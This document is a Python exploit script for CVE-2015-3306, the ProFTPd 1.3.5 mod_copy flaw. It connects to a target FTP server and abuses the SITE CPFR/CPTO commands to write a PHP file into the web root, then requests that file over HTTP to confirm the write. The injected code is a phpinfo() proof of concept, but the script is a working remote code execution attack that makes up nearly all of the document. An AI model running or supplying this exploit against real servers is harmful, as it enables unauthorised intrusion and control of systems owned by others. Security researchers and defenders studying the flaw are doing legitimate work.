ProFTPd 1.3.5 Remote Command Execution

`# Exploit Title: ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)  
# Date: 25/05/2021  
# Exploit Author: Shellbr3ak  
# Version: 1.3.5   
# Tested on: Ubuntu 16.04.6 LTS  
# CVE : CVE-2015-3306  
  
#!/usr/bin/env python3  
  
import sys  
import socket  
import requests  
  
def exploit(client, target):  
client.connect((target,21)) # Connecting to the target server  
banner = client.recv(74)  
print(banner.decode())  
client.send(b'site cpfr /etc/passwd\r\n')  
print(client.recv(1024).decode())  
client.send(b'site cpto <?php phpinfo(); ?>\r\n') # phpinfo() is just a PoC.  
print(client.recv(1024).decode())  
client.send(b'site cpfr /proc/self/fd/3\r\n')  
print(client.recv(1024).decode())  
client.send(b'site cpto /var/www/html/test.php\r\n')  
print(client.recv(1024).decode())  
client.close()  
print('Exploit Completed')  
  
def check(url):  
req = requests.get(url) # Requesting the written PoC php file via HTTP  
if req.status_code == 200:  
print('[+] File Written Successfully')  
print(f'[+] Go to : {url}')  
else:  
print('[!] Something Went Wrong')  
print('[!] Directory might not be writable')  
  
def main():  
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
target = sys.argv[1]  
exploit(client, target)  
url = 'http://' + target + '/test.php'  
check(url)  
  
if __name__ == '__main__':  
main()  
  
`